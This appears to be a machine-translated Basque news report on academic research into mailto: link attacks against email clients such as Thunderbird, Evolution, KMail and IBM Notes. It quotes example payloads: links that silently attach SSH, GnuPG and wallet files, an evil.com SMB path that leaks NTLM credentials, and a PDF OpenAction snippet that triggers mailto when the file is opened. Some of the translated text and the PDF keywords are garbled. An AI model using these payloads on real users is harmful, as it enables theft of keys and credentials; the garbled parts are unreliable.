Posta elektronikoko bezeroen erabiltzaileei erasotzea "mailto:" estekak erabiliz

Bochum (Alemania) Ruhr Unibertsitateko ikertzaileak aztertu (PDF) posta-bezeroen portaera "mailto:" estekak parametro aurreratuekin prozesatzen direnean. Aztertutako hogei posta-bezeroetatik bost "erantsi" parametroa erabiliz baliabideen ordezkapena manipulatzen zuen eraso baten aurrean zaurgarriak ziren. Sei posta elektronikoko bezero gehiago PGP eta S/MIME gakoak ordezkatzeko eraso baten aurrean zaurgarriak ziren, eta hiru bezero enkriptatutako mezuen edukia ateratzeko eraso baten aurrean.

Estekak Β«mailto:"Posta elektronikoko bezero baten irekiera automatizatzeko erabiltzen dira, estekan zehaztutako hartzaileari gutun bat idazteko. Helbideaz gain, estekaren parte gisa parametro osagarriak zehaz ditzakezu, hala nola gutunaren gaia eta ohiko edukirako txantiloia. Proposatutako erasoak β€œerantsi” parametroa manipulatzen du, eta horrek aukera ematen du sortutako mezuari eranskin bat eransteko.

Posta-bezeroak Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) eta Pegasus Mail eraso hutsal baten aurrean izan ziren, automatikoki eransteko aukera ematen dizuna. tokiko edozein fitxategi, "mailto:?attach=path_to_file" bezalako esteka baten bidez zehaztuta. Fitxategia abisurik erakutsi gabe eransten da, beraz, arreta berezirik gabe, baliteke erabiltzailea ez ohartzea gutuna eranskin batekin bidaliko dela.

Adibidez, "mailto:" bezalako esteka bat erabiliz[posta elektroniko bidez babestua]&subject=Izenburua&body=Testua&attach=~/.gnupg/secring.gpg" GnuPG-ko gako pribatuak txerta ditzakezu gutunean. Kripto-zorroen edukia ere bidal dezakezu (~/.bitcoin/wallet.dat), SSH gakoak (~/.ssh/id_rsa) eta erabiltzaileak eskura dituen edozein fitxategi. Gainera, Thunderbird-ek fitxategi-taldeak maskara bidez eransteko aukera ematen du, "attach=/tmp/*.txt" bezalako eraikuntzak erabiliz.

Fitxategi lokalez gain, posta elektronikoko bezero batzuek IMAP zerbitzariko sareko biltegiratze eta bideetarako estekak prozesatzen dituzte. Bereziki, IBM Notes-ek sareko direktorio batetik fitxategi bat transferitzeko aukera ematen du "attach=\\evil.com\dummyfile" bezalako estekak prozesatzen dituzunean, baita NTLM autentifikazio-parametroak atzematea ere, erasotzaileak kontrolatutako SMB zerbitzari batera esteka bat bidaliz. (eskaera uneko autentifikazio-parametroen erabiltzailearekin bidaliko da).

Thunderbird-ek "attach=imap:///fetch>UID>/INBOX>1/" bezalako eskaerak behar bezala prozesatzen ditu, IMAP zerbitzariko karpetetako edukia eransteko aukera ematen dutenak. Aldi berean, IMAPetik berreskuratutako mezuak, OpenPGP eta S/MIME bidez enkriptatutakoak, posta-bezeroak automatikoki deszifratzen ditu bidali aurretik. Thunderbird-en garatzaileak izan ziren jakinarazi arazoari buruz otsailean eta alean Thunderbird 78 arazoa konponduta dago jada (Thunderbird-en 52., 60. eta 68. adarrak zaurgarriak izaten jarraitzen dute).

Thunderbird-en bertsio zaharrak ere zaurgarriak ziren ikertzaileek proposatutako PGP eta S/MIME-n beste bi eraso aldaeraren aurrean. Hain zuzen ere, Thunderbird-ek, baita OutLook, PostBox, eM Client, MailMate eta R2Mail2-ek ere, gako ordezko eraso bat jasan zuten, posta-bezeroak S/MIME mezuetan igorritako ziurtagiri berriak automatikoki inportatu eta instalatzen dituelako, eta horrek aukera ematen du. Erasotzaileak dagoeneko gordetako gako publikoen ordezkapena antolatzeko.

Bigarren erasoak, Thunderbird, PostBox eta MailMate-k jasan ditzaketenak, mezuen zirriborroak automatikoki gordetzeko mekanismoaren ezaugarriak manipulatzen ditu eta aukera ematen du, mailto parametroak erabiliz, mezu enkriptatuak deszifratzen hasteko edo mezu arbitrarioetarako sinadura digitala gehitzeko aukera. ondoren, emaitza erasotzailearen IMAP zerbitzariari transmititzea. Eraso honetan, testu zifratua "body" parametroaren bidez transmititzen da, eta "meta freskatzea" etiketa erabiltzen da erasotzailearen IMAP zerbitzariari dei bat hasteko. Adibidez: ' '

Erabiltzaileen interakziorik gabe "mailto:" estekak automatikoki prozesatzeko, bereziki diseinatutako PDF dokumentuak erabil daitezke - PDFko OpenAction ekintzak dokumentu bat irekitzean mailto kudeatzailea automatikoki abiarazteko aukera ematen du:

%PDF-1.5
1 0 obj
<< /Mota /Katalogoa /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Mota /Ekintza /S /URI/URI (mailto:?body=β€”β€”HASI PGP MEZUAβ€”β€”[…])>>
endobj

Posta elektronikoko bezero erabiltzaileei erasotzea "mailto:" estekak erabiliz

Iturria: opennet.ru

Gehitu iruzkin berria